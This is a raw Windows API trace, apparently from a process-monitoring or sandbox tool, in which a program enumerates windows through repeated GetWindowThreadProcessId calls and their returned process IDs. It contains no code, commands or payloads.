	[0471.317] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.317] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x460
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1694
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1770
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1720
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x165c
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1578
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x16c0
	[0471.318] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x161c
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1638
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x15c8
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1554
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1674
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1520
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x14bc
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf8c
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe9c
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1434
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x14ec
	[0471.319] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xfcc
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x12ac
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1484
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x934
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc0c
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb08
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x948
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1178
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x13e0
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xcd0
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x13fc
	[0471.320] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xdc8
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc18
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc2c
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa1c
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1244
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xdb0
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1398
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1358
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1370
	[0471.321] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1340
	[0471.322] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x130c
	[0471.322] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x12c0
	[0471.322] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x12e4
	[0471.322] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1270
	[0471.322] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1298
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x120c
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x122c
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x11c4
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x11b0
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1188
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1148
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1160
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x10fc
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe34
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xea4
	[0471.323] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x514
	[0471.324] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe48
	[0471.324] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xbc8
	[0471.324] GetWindow (hWnd=0x1046e, uCmd=0x4) returned 0x0
	[0471.325] IsWindowVisible (hWnd=0x1046e) returned 0
	[0471.325] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xdf8
	[0471.325] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x318
	[0471.325] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xcac
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x8bc
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf9c
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf48
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe40
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xecc
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xeb8
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe80
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe98
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe60
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xee4
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xf00
	[0471.326] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xdf0
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xe1c
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xdd0
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd94
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd74
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xd00
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xcd8
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc84
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xca4
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc64
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xc24
	[0471.327] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb84
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xbac
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x384
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xab8
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x33c
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa44
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa64
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x8a8
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xaf0
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x88c
	[0471.328] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb04
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x910
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x230
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xac0
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xab4
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xaac
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x3d0
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x978
	[0471.329] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa7c
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x59c
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa88
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa6c
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa68
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x9f8
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa04
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x924
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x8dc
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x7dc
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x768
	[0471.330] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x764
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x820
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x810
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x794
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x83c
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x7ac
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb44
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb5c
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x838
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.331] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x818
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x5b8
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x494
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1ec
	[0471.332] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x440
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x7e8
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x730
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x2c8
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x31c
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x330
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x128
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x5c8
	[0471.333] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x6f8
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x358
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x73c
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xb0
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x250
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x240
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x790
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x61c
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x540
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x538
	[0471.334] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x568
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x538
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x568
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x538
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x540
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x540
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x57c
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x460
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x554
	[0471.335] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x528
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x79c
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.336] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4e0
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x460
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x460
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x44c
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x778
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x460
	[0471.337] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x558
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x4d0
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1198
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1080
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1074
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x106c
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1474
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1414
	[0471.338] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xbd0
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x550
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0xa38
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x16d0
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x16d4
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x15bc
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x15a0
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x159c
	[0471.339] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1598
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1594
	[0471.340] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xadc60 | out: lpdwProcessId=0xadc60) returned 0x1590
